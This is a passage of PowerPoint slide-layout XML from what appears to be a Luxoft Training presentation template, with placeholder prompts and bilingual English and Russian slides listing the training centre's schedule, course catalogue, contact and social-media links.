            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1600" baseline="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="pl-PL" smtClean="0"/>
              <a:t>Active projects</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Symbol zastępczy tekstu 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="25" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="822703"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31" name="Symbol zastępczy tekstu 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="26" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="822703"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32" name="Symbol zastępczy tekstu 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="27" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="822703" y="3066951"/>
            <a:ext cx="2554255" cy="1505053"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1600" baseline="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="pl-PL" smtClean="0"/>
              <a:t>Active projects</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="39" name="Obraz 38"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="392896" y="4870594"/>
            <a:ext cx="161912" cy="215882"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="40" name="Obraz 39"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="363187" y="1556141"/>
            <a:ext cx="226223" cy="238498"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="41" name="Obraz 40"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="364624" y="3165182"/>
            <a:ext cx="224784" cy="323373"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="264369577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Title</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Symbol zastępczy zawartości 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="286944" y="1196976"/>
            <a:ext cx="8593931" cy="5008562"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2461469473"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>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MANUALS">
    <p:bg>
      <p:bgRef idx="1001">
        <a:schemeClr val="bg1"/>
      </p:bgRef>
    </p:bg>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solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>Edit Title for Manuals</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Symbol zastępczy zawartości 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="286942" y="1879601"/>
            <a:ext cx="4184754" cy="4325936"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="359991">
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="pl-PL" smtClean="0"/>
              <a:t>Click to edit content</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Symbol zastępczy zawartości 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="12" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4660643" y="1879601"/>
            <a:ext cx="4219769" cy="4325936"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="359991">
              <a:defRPr lang="pl-PL" smtClean="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="pl-PL" smtClean="0"/>
              <a:t>Click to edit content</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Symbol zastępczy tekstu 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"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MANUALS SUBTITLE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3053899718"/>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formation (eng)">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113016" y="365126"/>
            <a:ext cx="8948791"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a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>LUXOFT TRAINING INFORMATION RESOURCES</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="4"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a:xfrm>
            <a:off x="361950" y="1360488"/>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7" name="Rectangle 35"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2233165" y="2637554"/>
            <a:ext cx="14208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2"/>
              </a:rPr>
              <a:t>IntHR</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" altLang="ru-RU" sz="1600" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>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sp>
        <p:nvSpPr>
          <p:cNvPr id="8"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smtClean="0">
                <a:ln w="3175">
                  <a:solidFill>
                    <a:schemeClr val="accent2">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:glow rad="38100">
                    <a:schemeClr val="accent1">
                      <a:satMod val="175000"/>
                      <a:alpha val="41000"/>
                    </a:schemeClr>
                  </a:glow>
                </a:effectLst>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>External resources</a:t>
            </a:r>
            <a:endPar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mn-lt"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9"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1"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Information about Luxoft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Training</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="004281"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>www.luxoft-training.ru/about</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err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Shedule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rgbClr val="1F5282"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>www.luxoft-training.ru/timetable</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F5282"/>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Courses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> catalogue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8"/>
              </a:rPr>
              <a:t>www.luxoft-training.ru/training/catalog_directions</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Contacts</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9"/>
              </a:rPr>
              <a:t>www.luxoft-training.ru/contacts</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1200" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>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mn-lt"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12"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493302" y="5757863"/>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userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4924425" y="5772472"/>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mn-lt"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>www.facebook.com/TrainingCenterLuxoft</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1200" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent2">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>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mn-lt"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14"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5"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6"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b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:glow rad="50800">
                    <a:srgbClr val="002060">
                      <a:alpha val="74000"/>
                    </a:srgbClr>
                  </a:glow>
                </a:effectLst>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Internal resources</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst>
                <a:glow rad="50800">
                  <a:srgbClr val="002060">
                    <a:alpha val="74000"/>
                  </a:srgbClr>
                </a:glow>
              </a:effectLst>
              <a:latin typeface="+mn-lt"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="485238" y="2659152"/>
            <a:ext cx="1817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mn-lt"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Schedule, courses, trainers</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="505786" y="3452313"/>
            <a:ext cx="1822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Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Study conditions, logistics, contacts</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Rectangle 35"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2243440" y="3587983"/>
            <a:ext cx="1420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pic>
        <p:nvPicPr>
          <p:cNvPr id="20"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54294"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>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formation (r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baseline="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Информационные ресурсы </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Luxoft Training</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="4"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a:xfrm>
            <a:off x="361950" y="1370013"/>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7" name="Rectangle 35"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2366727" y="2801938"/>
            <a:ext cx="142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2"/>
              </a:rPr>
              <a:t>IntHR</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" altLang="ru-RU" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>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sp>
        <p:nvSpPr>
          <p:cNvPr id="8"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cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Внешний</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" b="1" dirty="0">
                <a:ln w="3175">
                  <a:solidFill>
                    <a:schemeClr val="accent2">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:effectLst>
                  <a:glow rad="38100">
                    <a:schemeClr val="accent1">
                      <a:satMod val="175000"/>
                      <a:alpha val="41000"/>
                    </a:schemeClr>
                  </a:glow>
                </a:effectLst>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a: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ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ресурс</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9"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1"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Информация </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>об </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>учебном центре</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="004281"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>www.luxoft-training.ru/about</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Расписание </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="004281"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F5282"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>www.luxoft-training.ru/timetable</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F5282"/>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Каталог курсов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8"/>
              </a:rPr>
              <a:t>www.luxoft-training.ru/training/catalog_directions</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Контакты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9"/>
              </a:rPr>
              <a:t>www.luxoft-training.ru/contacts</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1200" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>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Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12"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702175" y="5526088"/>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userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5157788" y="5721350"/>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Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>www.facebook.com/TrainingCenterLuxoft</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1200" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent2">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>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Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14"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5"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6"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ru-RU" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:glow rad="50800">
                    <a:srgbClr val="002060">
                      <a:alpha val="74000"/>
                    </a:srgbClr>
                  </a:glow>
                </a:effectLst>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Внутренние ресурсы</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="736544" y="2720796"/>
            <a:ext cx="1638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Расписание, курсы, тренеры</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="462333" y="3538538"/>
            <a:ext cx="1971069" cy="85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Условия обучения, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>логистика,</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r" eaLnBrk="1" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="004281"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>контакты</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Rectangle 35"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2339170" y="3754975"/>
            <a:ext cx="1420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pic>
        <p:nvPicPr>
          <p:cNvPr id="20"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158572"/>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formation (rus)">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286919" y="365126"/>
            <a:ext cx="8593493"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baseline="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Информационные ресурсы </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Luxoft Training</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6"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361950" y="1370013"/>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8" name="Rectangle 35"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2366727" y="2801938"/>
            <a:ext cx="142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2"/>
              </a:rPr>
              <a:t>IntHR</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" altLang="ru-RU" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>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sp>
        <p:nvSpPr>
          <p:cNvPr id="9"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cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Внешний</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" b="1" dirty="0">
                <a:ln w="3175">
                  <a:solidFill>
                    <a:schemeClr val="accent2">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:effectLst>
                  <a:glow rad="38100">
                    <a:schemeClr val="accent1">
                      <a:satMod val="175000"/>
                      <a:alpha val="41000"/>
                    </a:schemeClr>
                  </a:glow>
                </a:effectLst>
